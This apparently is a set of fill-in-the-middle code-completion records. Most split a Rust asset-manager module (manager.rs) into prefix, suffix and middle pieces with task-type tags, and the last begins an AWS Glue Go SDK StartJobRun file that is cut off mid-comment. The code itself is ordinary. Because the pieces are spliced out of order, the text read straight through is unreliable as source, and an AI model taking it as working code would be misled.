/// If the Asset is not loading it will return None.
/// Will wait for the Asset to become available on the receiver and then returning it.
///
pub fn get_blocking<P: AsRef<Path>>(&mut self, path: P) -> Option<Arc<A::Structure>> {
match self.asset_handles.get(path.as_ref())?.get() {
None => {
if let Some(handle) = self.asset_handles.get_mut(path.as_ref()) {
if handle.status.eq(&LoadStatus::Loading) {
while let Ok((p, out)) = self.load_recv.recv() {
if let Ok(a) = A::construct(out, &handle.data, &self.data) {
handle.set(a);
self.loaded_once.push(path.as_ref().into());
if p.eq(path.as_ref()) {
return Some(handle.get()?.clone());
}
}
}
}
}
None
}
Some(a) => Some(a.clone()),
}
}
/// Returns loaded assets once as soon as they have the LoadStatus::Loaded.
pub fn get_loaded_once(&mut self) -> Vec<PathBuf> {
let mut list = Vec::new();
if !self.loaded_once.is_empty() {
std::mem::swap(&mut list, &mut self.loaded_once);
}
list
}
/// Returns the LoadStatus of an Asset known to the the Manager.
///
/// If the key is not found it will return None.
///
pub fn status<P: AsRef<Path>>(&self, path: P) -> Option<LoadStatus> {
Some(self.asset_handles.get(path.as_ref())?.status)
}
pub fn data_asset<P: AsRef<Path>>(&self, path: P) -> Option<&A::AssetSupplement>{
Some(&self.asset_handles.get(path.as_ref())?.data)
}
pub fn data_manager<P: AsRef<Path>>(&self) -> Option<&A::ManagerSupplement>{
Some(&self.data)
}
/// Maintains the manager. Needs to be called for lazy loading, to unload unused Assets and maybe even drop them.
/// The default Manager will not drop or unload any Assets. So maintain will just load Assets.
/// Will be slow if used with a large initial capacity + min_drop + min_unload as it will iterate over every Asset.
///
pub fn maintain(&mut self) {
if self.unload {
self.asset_handles
.values_mut()
.filter(|h| h.status.eq(&LoadStatus::Loaded))
.filter(|h| Arc::strong_count(h.get().unwrap()).eq(&1))
.for_each(|h| h.unload());
}
if self.drop {
let mut paths_to_drop = Vec::new();
for (path, handle) in self.asset_handles.iter() {
if self.drop && handle.status != LoadStatus::Loading {
paths_to_drop.push(path.clone());
}
}
for path in paths_to_drop {
self.drop(path);
}
}
for (p, b) in self.load_recv.try_iter() {
if let Some(handle) = self.asset_handles.get_mut(p.as_path()) {
if let Ok(a) = A::construct(b, &handle.data, &self.data) {
handle.set(a);
self.loaded_once.push(p);
}
} | ))
}
}
impl<A, L> Iterator for Manager<A, L>
where
A: Asset<L>,
L: Loader,
{
type Item = Option<Arc<A::Structure>>;
fn next(&mut self) -> Option<Self::Item> {
self.asset_handles
.iter()
.next()
.map(|(_, a)| a.get().map(|a| a.clone()))
}
} | }
}
pub fn strong_count<P: AsRef<Path>>(&mut self, path: P) -> Option<usize> {
Some(Arc::strong_count(
self.asset_handles.get(path.as_ref())?.get()?, | random_line_split |
manager.rs | use crate::{
asset::{Asset, AssetHandle},
loaders::{LoadStatus, Loader},
sources::Source,
};
use std::path::{Path, PathBuf};
use std::sync::mpsc::{Receiver, Sender};
use std::{collections::HashMap, io::ErrorKind, sync::Arc};
/// Manages the loading and unloading of one struct that implements the Asset trait.
/// Regular calls to maintain support lazy loading, auto unload(optional default:off) and auto drop(optional default:off).
pub struct | <A, L>
where
A: Asset<L>,
L: Loader,
{
drop: bool,
unload: bool,
loader_id: usize,
load_send: Sender<(usize, PathBuf, L::TransferSupplement)>,
load_recv: Receiver<(PathBuf, <L::Source as Source>::Output)>,
asset_handles: HashMap<PathBuf, AssetHandle<A, L>>,
loaded_once: Vec<PathBuf>,
data: A::ManagerSupplement,
}
unsafe impl<A, L> Sync for Manager<A, L>
where
A: Asset<L>,
L: Loader,
{
} //channels are unsafe to send but are only used internally.
impl<A, L> Manager<A, L>
where
A: Asset<L>,
L: Loader,
{
/// Construct a new, empty `Manager`.
///
/// The function does not allocate and the returned Managers main storage will have no
/// capacity until `insert` is called.
pub(crate) fn new(
loader_id: usize,
load_send: Sender<(usize, PathBuf, L::TransferSupplement)>,
load_recv: Receiver<(PathBuf, <L::Source as Source>::Output)>,
data: A::ManagerSupplement,
) -> Self {
Self {
drop: false,
unload: false,
loader_id,
load_send,
load_recv,
asset_handles: HashMap::new(),
loaded_once: Vec::new(),
data,
}
}
pub fn capacity(&self) -> usize {
self.asset_handles.capacity()
}
/// Set the `auto_dropout` of the Manager to `true`.
///
/// The Manager will drop the AssetHandle on the next call of its `maintain` function
/// if the asset is not loaded.
///
/// After dropping the AssetHandle the `key` may be reused!
///
pub fn auto_dropout(mut self) -> Self {
self.drop = true;
self
}
/// Set the `auto_unload` of the Manager to `true`.
///
/// The Manager will drop its reference to the Asset on the next call of its `maintain` function
/// if its strong_refcount is equal to 1.
///
pub fn auto_unload(mut self) -> Self {
self.unload = true;
self
}
/// Insert an Assets Path into the Manager and return its key without loading the asset.
/// If the specified path is already known to the Manager it will return the known paths key.
///
/// If auto_dropout is activated the Asset has to be explicitly loaded with the given key after inserting
/// or it will be dropped in the next call to maintain.
///
pub fn insert<P: AsRef<Path>>(&mut self, path: P, data: A::AssetSupplement) {
let path: PathBuf = path.as_ref().into();
self.asset_handles
.entry(path.clone())
.or_insert(AssetHandle::new(path, data));
}
/// Insert an Assets Path and the loaded Asset into the Manager and return its key.
/// If the specified path is already known to the Manager it will return the known paths key.
///
/// If auto_dropout is activated the Asset has to be explicitly loaded with the given key after inserting
/// or it will be dropped in the next call to maintain.
///
pub fn insert_raw<P: AsRef<Path>>(&mut self, path: P, asset: A::Structure, data: A::AssetSupplement) {
let path: PathBuf = path.as_ref().into();
let mut handle = AssetHandle::new(path.clone(), data);
handle.set(asset);
self.asset_handles.insert(path, handle);
}
/// Loads an unloaded Asset known to the the Manager and returns its Arc<T>.
/// If the asset is already loaded it will just return the Asset.
///
/// If there is no valid file found at the specified path it will return an io::Error.
/// If the key is not found it will return None.
///
pub fn load<P: AsRef<Path>>(&mut self, path: P, supp: L::TransferSupplement) -> Result<(), std::io::Error> {
let mut a = self
.asset_handles
.get_mut(path.as_ref())
.ok_or(std::io::Error::new(
ErrorKind::NotFound,
format!("Entry not found! {:?}", path.as_ref()),
))?;
if !path.as_ref().exists() {
Err(std::io::Error::new(
ErrorKind::NotFound,
format!("File not found! {:?}", path.as_ref()),
))
} else if a.status.eq(&LoadStatus::Loading){
Err(std::io::Error::new(
ErrorKind::AlreadyExists,
format!("Image already loading! {:?}", path.as_ref()),
))
} else {
a.status = LoadStatus::Loading;
let package = (self.loader_id, path.as_ref().into(), supp);
self
.load_send
.send(package)
.map_err(|e| std::io::Error::new(
ErrorKind::ConnectionReset,
format!("Error sending! {:?}", e),
))
}
}
/// Unloads an Asset known to the the Manager. The Asset can be reloaded with the same key.
///
/// The Arc of the Asset will be dropped. The Asset may still be used but the Manager wont know about it anymore.
/// If the key is not found it will do nothing.
///
pub fn unload<P: AsRef<Path>>(&mut self, path: P) {
if let Some(handle) = self.asset_handles.get_mut(path.as_ref()) {
handle.unload()
}
}
/// Drops an Asset known to the the Manager. The key may be reused by another Asset.
///
/// If the key is not found it will do nothing.
///
pub fn drop<P: AsRef<Path>>(&mut self, path: P) {
self.asset_handles.remove(path.as_ref());
}
/// Returns an Asset known to the the Manager.
///
/// If the key is not found it will return None.
/// If the Asset is not loaded it will return None.
/// Call status() to get detailed information.
///
pub fn get<P: AsRef<Path>>(&self, path: P) -> Option<Arc<A::Structure>> {
Some(self.asset_handles.get(path.as_ref())?.get()?.clone())
}
/// Returns an Asset known to the the Manager.
///
/// If the key is not found it will return None.
/// If the Asset is not loading it will return None.
/// Will wait for the Asset to become available on the receiver and then returning it.
///
pub fn get_blocking<P: AsRef<Path>>(&mut self, path: P) -> Option<Arc<A::Structure>> {
match self.asset_handles.get(path.as_ref())?.get() {
None => {
if let Some(handle) = self.asset_handles.get_mut(path.as_ref()) {
if handle.status.eq(&LoadStatus::Loading) {
while let Ok((p, out)) = self.load_recv.recv() {
if let Ok(a) = A::construct(out, &handle.data, &self.data) {
handle.set(a);
self.loaded_once.push(path.as_ref().into());
if p.eq(path.as_ref()) {
return Some(handle.get()?.clone());
}
}
}
}
}
None
}
Some(a) => Some(a.clone()),
}
}
/// Returns loaded assets once as soon as they have the LoadStatus::Loaded.
pub fn get_loaded_once(&mut self) -> Vec<PathBuf> {
let mut list = Vec::new();
if !self.loaded_once.is_empty() {
std::mem::swap(&mut list, &mut self.loaded_once);
}
list
}
/// Returns the LoadStatus of an Asset known to the the Manager.
///
/// If the key is not found it will return None.
///
pub fn status<P: AsRef<Path>>(&self, path: P) -> Option<LoadStatus> {
Some(self.asset_handles.get(path.as_ref())?.status)
}
pub fn data_asset<P: AsRef<Path>>(&self, path: P) -> Option<&A::AssetSupplement>{
Some(&self.asset_handles.get(path.as_ref())?.data)
}
pub fn data_manager<P: AsRef<Path>>(&self) -> Option<&A::ManagerSupplement>{
Some(&self.data)
}
/// Maintains the manager. Needs to be called for lazy loading, to unload unused Assets and maybe even drop them.
/// The default Manager will not drop or unload any Assets. So maintain will just load Assets.
/// Will be slow if used with a large initial capacity + min_drop + min_unload as it will iterate over every Asset.
///
pub fn maintain(&mut self) {
if self.unload {
self.asset_handles
.values_mut()
.filter(|h| h.status.eq(&LoadStatus::Loaded))
.filter(|h| Arc::strong_count(h.get().unwrap()).eq(&1))
.for_each(|h| h.unload());
}
if self.drop {
let mut paths_to_drop = Vec::new();
for (path, handle) in self.asset_handles.iter() {
if self.drop && handle.status != LoadStatus::Loading {
paths_to_drop.push(path.clone());
}
}
for path in paths_to_drop {
self.drop(path);
}
}
for (p, b) in self.load_recv.try_iter() {
if let Some(handle) = self.asset_handles.get_mut(p.as_path()) {
if let Ok(a) = A::construct(b, &handle.data, &self.data) {
handle.set(a);
self.loaded_once.push(p);
}
}
}
}
pub fn strong_count<P: AsRef<Path>>(&mut self, path: P) -> Option<usize> {
Some(Arc::strong_count(
self.asset_handles.get(path.as_ref())?.get()?,
))
}
}
impl<A, L> Iterator for Manager<A, L>
where
A: Asset<L>,
L: Loader,
{
type Item = Option<Arc<A::Structure>>;
fn next(&mut self) -> Option<Self::Item> {
self.asset_handles
.iter()
.next()
.map(|(_, a)| a.get().map(|a| a.clone()))
}
}
| Manager | identifier_name |
manager.rs | use crate::{
asset::{Asset, AssetHandle},
loaders::{LoadStatus, Loader},
sources::Source,
};
use std::path::{Path, PathBuf};
use std::sync::mpsc::{Receiver, Sender};
use std::{collections::HashMap, io::ErrorKind, sync::Arc};
/// Manages the loading and unloading of one struct that implements the Asset trait.
/// Regular calls to maintain support lazy loading, auto unload(optional default:off) and auto drop(optional default:off).
pub struct Manager<A, L>
where
A: Asset<L>,
L: Loader,
{
drop: bool,
unload: bool,
loader_id: usize,
load_send: Sender<(usize, PathBuf, L::TransferSupplement)>,
load_recv: Receiver<(PathBuf, <L::Source as Source>::Output)>,
asset_handles: HashMap<PathBuf, AssetHandle<A, L>>,
loaded_once: Vec<PathBuf>,
data: A::ManagerSupplement,
}
unsafe impl<A, L> Sync for Manager<A, L>
where
A: Asset<L>,
L: Loader,
{
} //channels are unsafe to send but are only used internally.
impl<A, L> Manager<A, L>
where
A: Asset<L>,
L: Loader,
{
/// Construct a new, empty `Manager`.
///
/// The function does not allocate and the returned Managers main storage will have no
/// capacity until `insert` is called.
pub(crate) fn new(
loader_id: usize,
load_send: Sender<(usize, PathBuf, L::TransferSupplement)>,
load_recv: Receiver<(PathBuf, <L::Source as Source>::Output)>,
data: A::ManagerSupplement,
) -> Self {
Self {
drop: false,
unload: false,
loader_id,
load_send,
load_recv,
asset_handles: HashMap::new(),
loaded_once: Vec::new(),
data,
}
}
pub fn capacity(&self) -> usize {
self.asset_handles.capacity()
}
/// Set the `auto_dropout` of the Manager to `true`.
///
/// The Manager will drop the AssetHandle on the next call of its `maintain` function
/// if the asset is not loaded.
///
/// After dropping the AssetHandle the `key` may be reused!
///
pub fn auto_dropout(mut self) -> Self {
self.drop = true;
self
}
/// Set the `auto_unload` of the Manager to `true`.
///
/// The Manager will drop its reference to the Asset on the next call of its `maintain` function
/// if its strong_refcount is equal to 1.
///
pub fn auto_unload(mut self) -> Self {
self.unload = true;
self
}
/// Insert an Assets Path into the Manager and return its key without loading the asset.
/// If the specified path is already known to the Manager it will return the known paths key.
///
/// If auto_dropout is activated the Asset has to be explicitly loaded with the given key after inserting
/// or it will be dropped in the next call to maintain.
///
pub fn insert<P: AsRef<Path>>(&mut self, path: P, data: A::AssetSupplement) {
let path: PathBuf = path.as_ref().into();
self.asset_handles
.entry(path.clone())
.or_insert(AssetHandle::new(path, data));
}
/// Insert an Assets Path and the loaded Asset into the Manager and return its key.
/// If the specified path is already known to the Manager it will return the known paths key.
///
/// If auto_dropout is activated the Asset has to be explicitly loaded with the given key after inserting
/// or it will be dropped in the next call to maintain.
///
pub fn insert_raw<P: AsRef<Path>>(&mut self, path: P, asset: A::Structure, data: A::AssetSupplement) {
let path: PathBuf = path.as_ref().into();
let mut handle = AssetHandle::new(path.clone(), data);
handle.set(asset);
self.asset_handles.insert(path, handle);
}
/// Loads an unloaded Asset known to the the Manager and returns its Arc<T>.
/// If the asset is already loaded it will just return the Asset.
///
/// If there is no valid file found at the specified path it will return an io::Error.
/// If the key is not found it will return None.
///
pub fn load<P: AsRef<Path>>(&mut self, path: P, supp: L::TransferSupplement) -> Result<(), std::io::Error> {
let mut a = self
.asset_handles
.get_mut(path.as_ref())
.ok_or(std::io::Error::new(
ErrorKind::NotFound,
format!("Entry not found! {:?}", path.as_ref()),
))?;
if !path.as_ref().exists() {
Err(std::io::Error::new(
ErrorKind::NotFound,
format!("File not found! {:?}", path.as_ref()),
))
} else if a.status.eq(&LoadStatus::Loading) | else {
a.status = LoadStatus::Loading;
let package = (self.loader_id, path.as_ref().into(), supp);
self
.load_send
.send(package)
.map_err(|e| std::io::Error::new(
ErrorKind::ConnectionReset,
format!("Error sending! {:?}", e),
))
}
}
/// Unloads an Asset known to the the Manager. The Asset can be reloaded with the same key.
///
/// The Arc of the Asset will be dropped. The Asset may still be used but the Manager wont know about it anymore.
/// If the key is not found it will do nothing.
///
pub fn unload<P: AsRef<Path>>(&mut self, path: P) {
if let Some(handle) = self.asset_handles.get_mut(path.as_ref()) {
handle.unload()
}
}
/// Drops an Asset known to the the Manager. The key may be reused by another Asset.
///
/// If the key is not found it will do nothing.
///
pub fn drop<P: AsRef<Path>>(&mut self, path: P) {
self.asset_handles.remove(path.as_ref());
}
/// Returns an Asset known to the the Manager.
///
/// If the key is not found it will return None.
/// If the Asset is not loaded it will return None.
/// Call status() to get detailed information.
///
pub fn get<P: AsRef<Path>>(&self, path: P) -> Option<Arc<A::Structure>> {
Some(self.asset_handles.get(path.as_ref())?.get()?.clone())
}
/// Returns an Asset known to the the Manager.
///
/// If the key is not found it will return None.
/// If the Asset is not loading it will return None.
/// Will wait for the Asset to become available on the receiver and then returning it.
///
pub fn get_blocking<P: AsRef<Path>>(&mut self, path: P) -> Option<Arc<A::Structure>> {
match self.asset_handles.get(path.as_ref())?.get() {
None => {
if let Some(handle) = self.asset_handles.get_mut(path.as_ref()) {
if handle.status.eq(&LoadStatus::Loading) {
while let Ok((p, out)) = self.load_recv.recv() {
if let Ok(a) = A::construct(out, &handle.data, &self.data) {
handle.set(a);
self.loaded_once.push(path.as_ref().into());
if p.eq(path.as_ref()) {
return Some(handle.get()?.clone());
}
}
}
}
}
None
}
Some(a) => Some(a.clone()),
}
}
/// Returns loaded assets once as soon as they have the LoadStatus::Loaded.
pub fn get_loaded_once(&mut self) -> Vec<PathBuf> {
let mut list = Vec::new();
if !self.loaded_once.is_empty() {
std::mem::swap(&mut list, &mut self.loaded_once);
}
list
}
/// Returns the LoadStatus of an Asset known to the the Manager.
///
/// If the key is not found it will return None.
///
pub fn status<P: AsRef<Path>>(&self, path: P) -> Option<LoadStatus> {
Some(self.asset_handles.get(path.as_ref())?.status)
}
pub fn data_asset<P: AsRef<Path>>(&self, path: P) -> Option<&A::AssetSupplement>{
Some(&self.asset_handles.get(path.as_ref())?.data)
}
pub fn data_manager<P: AsRef<Path>>(&self) -> Option<&A::ManagerSupplement>{
Some(&self.data)
}
/// Maintains the manager. Needs to be called for lazy loading, to unload unused Assets and maybe even drop them.
/// The default Manager will not drop or unload any Assets. So maintain will just load Assets.
/// Will be slow if used with a large initial capacity + min_drop + min_unload as it will iterate over every Asset.
///
pub fn maintain(&mut self) {
if self.unload {
self.asset_handles
.values_mut()
.filter(|h| h.status.eq(&LoadStatus::Loaded))
.filter(|h| Arc::strong_count(h.get().unwrap()).eq(&1))
.for_each(|h| h.unload());
}
if self.drop {
let mut paths_to_drop = Vec::new();
for (path, handle) in self.asset_handles.iter() {
if self.drop && handle.status != LoadStatus::Loading {
paths_to_drop.push(path.clone());
}
}
for path in paths_to_drop {
self.drop(path);
}
}
for (p, b) in self.load_recv.try_iter() {
if let Some(handle) = self.asset_handles.get_mut(p.as_path()) {
if let Ok(a) = A::construct(b, &handle.data, &self.data) {
handle.set(a);
self.loaded_once.push(p);
}
}
}
}
pub fn strong_count<P: AsRef<Path>>(&mut self, path: P) -> Option<usize> {
Some(Arc::strong_count(
self.asset_handles.get(path.as_ref())?.get()?,
))
}
}
impl<A, L> Iterator for Manager<A, L>
where
A: Asset<L>,
L: Loader,
{
type Item = Option<Arc<A::Structure>>;
fn next(&mut self) -> Option<Self::Item> {
self.asset_handles
.iter()
.next()
.map(|(_, a)| a.get().map(|a| a.clone()))
}
}
| {
Err(std::io::Error::new(
ErrorKind::AlreadyExists,
format!("Image already loading! {:?}", path.as_ref()),
))
} | conditional_block |
manager.rs | use crate::{
asset::{Asset, AssetHandle},
loaders::{LoadStatus, Loader},
sources::Source,
};
use std::path::{Path, PathBuf};
use std::sync::mpsc::{Receiver, Sender};
use std::{collections::HashMap, io::ErrorKind, sync::Arc};
/// Manages the loading and unloading of one struct that implements the Asset trait.
/// Regular calls to maintain support lazy loading, auto unload(optional default:off) and auto drop(optional default:off).
pub struct Manager<A, L>
where
A: Asset<L>,
L: Loader,
{
drop: bool,
unload: bool,
loader_id: usize,
load_send: Sender<(usize, PathBuf, L::TransferSupplement)>,
load_recv: Receiver<(PathBuf, <L::Source as Source>::Output)>,
asset_handles: HashMap<PathBuf, AssetHandle<A, L>>,
loaded_once: Vec<PathBuf>,
data: A::ManagerSupplement,
}
unsafe impl<A, L> Sync for Manager<A, L>
where
A: Asset<L>,
L: Loader,
{
} //channels are unsafe to send but are only used internally.
impl<A, L> Manager<A, L>
where
A: Asset<L>,
L: Loader,
{
/// Construct a new, empty `Manager`.
///
/// The function does not allocate and the returned Managers main storage will have no
/// capacity until `insert` is called.
pub(crate) fn new(
loader_id: usize,
load_send: Sender<(usize, PathBuf, L::TransferSupplement)>,
load_recv: Receiver<(PathBuf, <L::Source as Source>::Output)>,
data: A::ManagerSupplement,
) -> Self {
Self {
drop: false,
unload: false,
loader_id,
load_send,
load_recv,
asset_handles: HashMap::new(),
loaded_once: Vec::new(),
data,
}
}
pub fn capacity(&self) -> usize {
self.asset_handles.capacity()
}
/// Set the `auto_dropout` of the Manager to `true`.
///
/// The Manager will drop the AssetHandle on the next call of its `maintain` function
/// if the asset is not loaded.
///
/// After dropping the AssetHandle the `key` may be reused!
///
pub fn auto_dropout(mut self) -> Self {
self.drop = true;
self
}
/// Set the `auto_unload` of the Manager to `true`.
///
/// The Manager will drop its reference to the Asset on the next call of its `maintain` function
/// if its strong_refcount is equal to 1.
///
pub fn auto_unload(mut self) -> Self {
self.unload = true;
self
}
/// Insert an Assets Path into the Manager and return its key without loading the asset.
/// If the specified path is already known to the Manager it will return the known paths key.
///
/// If auto_dropout is activated the Asset has to be explicitly loaded with the given key after inserting
/// or it will be dropped in the next call to maintain.
///
pub fn insert<P: AsRef<Path>>(&mut self, path: P, data: A::AssetSupplement) {
let path: PathBuf = path.as_ref().into();
self.asset_handles
.entry(path.clone())
.or_insert(AssetHandle::new(path, data));
}
/// Insert an Assets Path and the loaded Asset into the Manager and return its key.
/// If the specified path is already known to the Manager it will return the known paths key.
///
/// If auto_dropout is activated the Asset has to be explicitly loaded with the given key after inserting
/// or it will be dropped in the next call to maintain.
///
pub fn insert_raw<P: AsRef<Path>>(&mut self, path: P, asset: A::Structure, data: A::AssetSupplement) {
let path: PathBuf = path.as_ref().into();
let mut handle = AssetHandle::new(path.clone(), data);
handle.set(asset);
self.asset_handles.insert(path, handle);
}
/// Loads an unloaded Asset known to the the Manager and returns its Arc<T>.
/// If the asset is already loaded it will just return the Asset.
///
/// If there is no valid file found at the specified path it will return an io::Error.
/// If the key is not found it will return None.
///
pub fn load<P: AsRef<Path>>(&mut self, path: P, supp: L::TransferSupplement) -> Result<(), std::io::Error> {
let mut a = self
.asset_handles
.get_mut(path.as_ref())
.ok_or(std::io::Error::new(
ErrorKind::NotFound,
format!("Entry not found! {:?}", path.as_ref()),
))?;
if !path.as_ref().exists() {
Err(std::io::Error::new(
ErrorKind::NotFound,
format!("File not found! {:?}", path.as_ref()),
))
} else if a.status.eq(&LoadStatus::Loading){
Err(std::io::Error::new(
ErrorKind::AlreadyExists,
format!("Image already loading! {:?}", path.as_ref()),
))
} else {
a.status = LoadStatus::Loading;
let package = (self.loader_id, path.as_ref().into(), supp);
self
.load_send
.send(package)
.map_err(|e| std::io::Error::new(
ErrorKind::ConnectionReset,
format!("Error sending! {:?}", e),
))
}
}
/// Unloads an Asset known to the the Manager. The Asset can be reloaded with the same key.
///
/// The Arc of the Asset will be dropped. The Asset may still be used but the Manager wont know about it anymore.
/// If the key is not found it will do nothing.
///
pub fn unload<P: AsRef<Path>>(&mut self, path: P) {
if let Some(handle) = self.asset_handles.get_mut(path.as_ref()) {
handle.unload()
}
}
/// Drops an Asset known to the the Manager. The key may be reused by another Asset.
///
/// If the key is not found it will do nothing.
///
pub fn drop<P: AsRef<Path>>(&mut self, path: P) {
self.asset_handles.remove(path.as_ref());
}
/// Returns an Asset known to the the Manager.
///
/// If the key is not found it will return None.
/// If the Asset is not loaded it will return None.
/// Call status() to get detailed information.
///
pub fn get<P: AsRef<Path>>(&self, path: P) -> Option<Arc<A::Structure>> {
Some(self.asset_handles.get(path.as_ref())?.get()?.clone())
}
/// Returns an Asset known to the the Manager.
///
/// If the key is not found it will return None.
/// If the Asset is not loading it will return None.
/// Will wait for the Asset to become available on the receiver and then returning it.
///
pub fn get_blocking<P: AsRef<Path>>(&mut self, path: P) -> Option<Arc<A::Structure>> {
match self.asset_handles.get(path.as_ref())?.get() {
None => {
if let Some(handle) = self.asset_handles.get_mut(path.as_ref()) {
if handle.status.eq(&LoadStatus::Loading) {
while let Ok((p, out)) = self.load_recv.recv() {
if let Ok(a) = A::construct(out, &handle.data, &self.data) {
handle.set(a);
self.loaded_once.push(path.as_ref().into());
if p.eq(path.as_ref()) {
return Some(handle.get()?.clone());
}
}
}
}
}
None
}
Some(a) => Some(a.clone()),
}
}
/// Returns loaded assets once as soon as they have the LoadStatus::Loaded.
pub fn get_loaded_once(&mut self) -> Vec<PathBuf> {
let mut list = Vec::new();
if !self.loaded_once.is_empty() {
std::mem::swap(&mut list, &mut self.loaded_once);
}
list
}
/// Returns the LoadStatus of an Asset known to the the Manager.
///
/// If the key is not found it will return None.
///
pub fn status<P: AsRef<Path>>(&self, path: P) -> Option<LoadStatus> {
Some(self.asset_handles.get(path.as_ref())?.status)
}
pub fn data_asset<P: AsRef<Path>>(&self, path: P) -> Option<&A::AssetSupplement>{
Some(&self.asset_handles.get(path.as_ref())?.data)
}
pub fn data_manager<P: AsRef<Path>>(&self) -> Option<&A::ManagerSupplement>{
Some(&self.data)
}
/// Maintains the manager. Needs to be called for lazy loading, to unload unused Assets and maybe even drop them.
/// The default Manager will not drop or unload any Assets. So maintain will just load Assets.
/// Will be slow if used with a large initial capacity + min_drop + min_unload as it will iterate over every Asset.
///
pub fn maintain(&mut self) {
if self.unload {
self.asset_handles
.values_mut()
.filter(|h| h.status.eq(&LoadStatus::Loaded))
.filter(|h| Arc::strong_count(h.get().unwrap()).eq(&1))
.for_each(|h| h.unload());
}
if self.drop {
let mut paths_to_drop = Vec::new();
for (path, handle) in self.asset_handles.iter() {
if self.drop && handle.status != LoadStatus::Loading {
paths_to_drop.push(path.clone());
}
}
for path in paths_to_drop {
self.drop(path);
}
}
for (p, b) in self.load_recv.try_iter() {
if let Some(handle) = self.asset_handles.get_mut(p.as_path()) {
if let Ok(a) = A::construct(b, &handle.data, &self.data) {
handle.set(a);
self.loaded_once.push(p);
}
}
}
}
pub fn strong_count<P: AsRef<Path>>(&mut self, path: P) -> Option<usize> {
Some(Arc::strong_count(
self.asset_handles.get(path.as_ref())?.get()?,
))
}
}
impl<A, L> Iterator for Manager<A, L>
where
A: Asset<L>,
L: Loader,
{
type Item = Option<Arc<A::Structure>>;
fn next(&mut self) -> Option<Self::Item> |
}
| {
self.asset_handles
.iter()
.next()
.map(|(_, a)| a.get().map(|a| a.clone()))
} | identifier_body |
api_op_StartJobRun.go | // Code generated by smithy-go-codegen DO NOT EDIT.
package glue
import (
"context"
"errors"
"fmt"
"github.com/aws/aws-sdk-go-v2/aws"
awsmiddleware "github.com/aws/aws-sdk-go-v2/aws/middleware"
"github.com/aws/aws-sdk-go-v2/aws/signer/v4"
internalauth "github.com/aws/aws-sdk-go-v2/internal/auth"
"github.com/aws/aws-sdk-go-v2/service/glue/types"
smithyendpoints "github.com/aws/smithy-go/endpoints"
"github.com/aws/smithy-go/middleware"
smithyhttp "github.com/aws/smithy-go/transport/http"
)
// Starts a job run using a job definition.
func (c *Client) StartJobRun(ctx context.Context, params *StartJobRunInput, optFns ...func(*Options)) (*StartJobRunOutput, error) {
if params == nil {
params = &StartJobRunInput{}
}
result, metadata, err := c.invokeOperation(ctx, "StartJobRun", params, optFns, c.addOperationStartJobRunMiddlewares)
if err != nil {
return nil, err
}
out := result.(*StartJobRunOutput)
out.ResultMetadata = metadata
return out, nil
}
type StartJobRunInput struct {
// The name of the job definition to use.
//
// This member is required.
JobName *string
// This field is deprecated. Use MaxCapacity instead. The number of Glue data
// processing units (DPUs) to allocate to this JobRun. You can allocate a minimum
// of 2 DPUs; the default is 10. A DPU is a relative measure of processing power
// that consists of 4 vCPUs of compute capacity and 16 GB of memory. For more
// information, see the Glue pricing page (https://aws.amazon.com/glue/pricing/) .
//
// Deprecated: This property is deprecated, use MaxCapacity instead.
AllocatedCapacity int32
// The job arguments associated with this run. For this job run, they replace the
// default arguments set in the job definition itself. You can specify arguments
// here that your own job-execution script consumes, as well as arguments that Glue
// itself consumes. Job arguments may be logged. Do not pass plaintext secrets as
// arguments. Retrieve secrets from a Glue Connection, Secrets Manager or other
// secret management mechanism if you intend to keep them within the Job. For
// information about how to specify and consume your own Job arguments, see the
// Calling Glue APIs in Python (https://docs.aws.amazon.com/glue/latest/dg/aws-glue-programming-python-calling.html)
// topic in the developer guide. For information about the arguments you can
// provide to this field when configuring Spark jobs, see the Special Parameters
// Used by Glue (https://docs.aws.amazon.com/glue/latest/dg/aws-glue-programming-etl-glue-arguments.html)
// topic in the developer guide. For information about the arguments you can
// provide to this field when configuring Ray jobs, see Using job parameters in
// Ray jobs (https://docs.aws.amazon.com/glue/latest/dg/author-job-ray-job-parameters.html)
// in the developer guide.
Arguments map[string]string
// Indicates whether the job is run with a standard or flexible execution class.
// The standard execution-class is ideal for time-sensitive workloads that require
// fast job startup and dedicated resources. The flexible execution class is
// appropriate for time-insensitive jobs whose start and completion times may vary.
// Only jobs with Glue version 3.0 and above and command type glueetl will be
// allowed to set ExecutionClass to FLEX . The flexible execution class is
// available for Spark jobs.
ExecutionClass types.ExecutionClass
// The ID of a previous JobRun to retry.
JobRunId *string
// For Glue version 1.0 or earlier jobs, using the standard worker type, the
// number of Glue data processing units (DPUs) that can be allocated when this job
// runs. A DPU is a relative measure of processing power that consists of 4 vCPUs
// of compute capacity and 16 GB of memory. For more information, see the Glue
// pricing page (https://aws.amazon.com/glue/pricing/) . For Glue version 2.0+
// jobs, you cannot specify a Maximum capacity . Instead, you should specify a
// Worker type and the Number of workers . Do not set MaxCapacity if using
// WorkerType and NumberOfWorkers . The value that can be allocated for MaxCapacity
// depends on whether you are running a Python shell job, an Apache Spark ETL job,
// or an Apache Spark streaming ETL job:
// - When you specify a Python shell job ( JobCommand.Name ="pythonshell"), you
// can allocate either 0.0625 or 1 DPU. The default is 0.0625 DPU.
// - When you specify an Apache Spark ETL job ( JobCommand.Name ="glueetl") or
// Apache Spark streaming ETL job ( JobCommand.Name ="gluestreaming"), you can
// allocate from 2 to 100 DPUs. The default is 10 DPUs. This job type cannot have a
// fractional DPU allocation.
MaxCapacity *float64
// Specifies configuration properties of a job run notification.
NotificationProperty *types.NotificationProperty
// The number of workers of a defined workerType that are allocated when a job
// runs.
NumberOfWorkers *int32
// The name of the SecurityConfiguration structure to be used with this job run.
SecurityConfiguration *string
// The JobRun timeout in minutes. This is the maximum time that a job run can
// consume resources before it is terminated and enters TIMEOUT status. This value
// overrides the timeout value set in the parent job. Streaming jobs do not have a
// timeout. The default for non-streaming jobs is 2,880 minutes (48 hours).
Timeout *int32
// The type of predefined worker that is allocated when a job runs. Accepts a
// value of G.1X, G.2X, G.4X, G.8X or G.025X for Spark jobs. Accepts the value Z.2X
// for Ray jobs.
// - For the G.1X worker type, each worker maps to 1 DPU (4 vCPUs, 16 GB of
// memory) with 84GB disk (approximately 34GB free), and provides 1 executor per
// worker. We recommend this worker type for workloads such as data transforms,
// joins, and queries, to offers a scalable and cost effective way to run most
// jobs.
// - For the G.2X worker type, each worker maps to 2 DPU (8 vCPUs, 32 GB of
// memory) with 128GB disk (approximately 77GB free), and provides 1 executor per
// worker. We recommend this worker type for workloads such as data transforms,
// joins, and queries, to offers a scalable and cost effective way to run most
// jobs.
// - For the G.4X worker type, each worker maps to 4 DPU (16 vCPUs, 64 GB of
